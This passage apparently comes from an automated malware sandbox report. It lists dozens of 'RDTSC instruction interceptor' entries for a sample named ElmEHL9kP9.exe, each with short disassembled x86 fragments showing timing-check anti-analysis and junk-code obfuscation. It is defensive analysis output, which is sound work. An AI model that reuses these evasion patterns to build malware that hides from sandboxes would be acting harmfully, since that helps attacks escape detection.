0x00000059 or dword ptr [ebp+122D315Fh], edx 0x0000005f cmp dword ptr [ebp+122D395Eh], 00000000h 0x00000066 jne 00007F79C0CFE329h 0x0000006c cld 0x0000006d mov byte ptr [ebp+122D28D4h], 00000047h 0x00000074 mov ecx, dword ptr [ebp+122D3882h] 0x0000007a mov eax, D49AA7D2h 0x0000007f mov ecx, dword ptr [ebp+122D34D6h] 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 jmp 00007F79C0CFE2A5h 0x0000008d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59BBE9 second address: 59BBF3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79C051386Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59BF16 second address: 59BF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59BF1A second address: 59BF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59BF20 second address: 59BF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79C0CFE29Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59BF2E second address: 59BF5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C051386Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 36101711h 0x00000012 mov dword ptr [ebp+122D2257h], eax 0x00000018 call 00007F79C0513869h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59BF5E second address: 59BF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59C377 second address: 59C392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79C0513876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59C392 second address: 59C39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59C39F second address: 59C3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59C3A3 second address: 59C3B1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F79C0CFE296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59C3B1 second address: 59C3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59C3B5 second address: 59C3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D1C4Fh], esi 0x00000011 push 00000004h 0x00000013 mov edx, dword ptr [ebp+122D391Eh] 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59C3E9 second address: 59C3EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59C3EF second address: 59C3F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59C814 second address: 59C8A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F79C0513868h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 jmp 00007F79C0513873h 0x0000002a push 0000001Eh 0x0000002c mov dword ptr [ebp+122D1FE3h], esi 0x00000032 nop 0x00000033 jmp 00007F79C0513876h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F79C0513875h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59CA0B second address: 59CA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA1DA second address: 5DA1E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA1E6 second address: 5DA1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA477 second address: 5DA481 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79C0513866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA481 second address: 5DA496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007F79C0CFE296h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA496 second address: 5DA49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA75F second address: 5DA793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0CFE2A2h 0x00000009 popad 0x0000000a push edx 0x0000000b jmp 00007F79C0CFE2A9h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA793 second address: 5DA799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA799 second address: 5DA79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA79D second address: 5DA7A7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79C0513866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA924 second address: 5DA92A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DA92A second address: 5DA938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F79C0513872h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DAA90 second address: 5DAA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DABC9 second address: 5DABDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F79C051386Ah 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DABDB second address: 5DABFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A9h 0x00000007 jnc 00007F79C0CFE296h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DABFE second address: 5DAC20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513870h 0x00000007 push ecx 0x00000008 jns 00007F79C0513866h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DE2B9 second address: 5DE2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5DE2BD second address: 5DE2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E3937 second address: 5E393B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E393B second address: 5E3947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E3947 second address: 5E394B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E3AA5 second address: 5E3AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E3AA9 second address: 5E3AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E3AAF second address: 5E3ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F79C0513872h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E3ACC second address: 5E3AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E3AD2 second address: 5E3AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F79C0513879h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E3AF6 second address: 5E3B06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F79C0CFE296h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E7D6F second address: 5E7D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E7D78 second address: 5E7DA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A1h 0x00000007 jmp 00007F79C0CFE2A5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5E7DA2 second address: 5E7DDD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F79C051386Ch 0x00000008 jl 00007F79C0513868h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F79C0513877h 0x00000018 pushad 0x00000019 jng 00007F79C0513866h 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5EA201 second address: 5EA207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5EA207 second address: 5EA221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0513875h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5EA221 second address: 5EA232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F79C0CFE296h 0x00000009 jo 00007F79C0CFE296h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5EDF45 second address: 5EDF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C051386Fh 0x00000009 jmp 00007F79C0513875h 0x0000000e popad 0x0000000f jmp 00007F79C051386Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 je 00007F79C0513866h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5ED64A second address: 5ED693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A3h 0x00000007 jmp 00007F79C0CFE2A8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F79C0CFE296h 0x00000016 jmp 00007F79C0CFE2A2h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5ED693 second address: 5ED699 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F01DC second address: 5F01E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F01E2 second address: 5F01EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F1878 second address: 5F1898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79C0CFE2A6h 0x00000009 jnc 00007F79C0CFE296h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F1898 second address: 5F18A7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79C0513866h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F18A7 second address: 5F18AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F5EDF second address: 5F5EF5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F79C0513866h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d jg 00007F79C051387Ah 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F5EF5 second address: 5F5F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F61D8 second address: 5F61DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F61DE second address: 5F61E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F61E4 second address: 5F61FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007F79C0513866h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F79C0513866h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F61FA second address: 5F61FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59C668 second address: 59C66E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5F6FC7 second address: 5F6FCD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5FB162 second address: 5FB166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 600644 second address: 60064C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 60064C second address: 600670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007F79C0513868h 0x0000000b popad 0x0000000c jnp 00007F79C0513893h 0x00000012 jns 00007F79C051386Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 600670 second address: 600676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 600979 second address: 600983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F79C0513866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 600983 second address: 60098B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 600C13 second address: 600C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 600C19 second address: 600C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 600C1D second address: 600C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 600C23 second address: 600C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79C0CFE2A7h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007F79C0CFE296h 0x00000014 jmp 00007F79C0CFE29Fh 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F79C0CFE2A3h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 600C6E second address: 600C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F79C0513866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 600C78 second address: 600C81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 601C35 second address: 601C3B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 601F78 second address: 601FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F79C0CFE2A6h 0x0000000f jmp 00007F79C0CFE2A0h 0x00000014 jo 00007F79C0CFE29Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 606F39 second address: 606F3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 606134 second address: 606138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 606138 second address: 60613C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6063F6 second address: 606400 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 606400 second address: 606408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 606567 second address: 60659F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0CFE29Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F79C0CFE2A9h 0x00000010 jmp 00007F79C0CFE29Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 60659F second address: 6065DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F79C0513877h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jo 00007F79C05138A7h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F79C0513873h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6065DA second address: 6065DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6065DE second address: 6065F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79C051386Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 6065F6 second address: 6065FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 60671C second address: 60672C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F79C051386Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 60672C second address: 606732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 606732 second address: 60673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F79C0513866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 60673C second address: 606740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
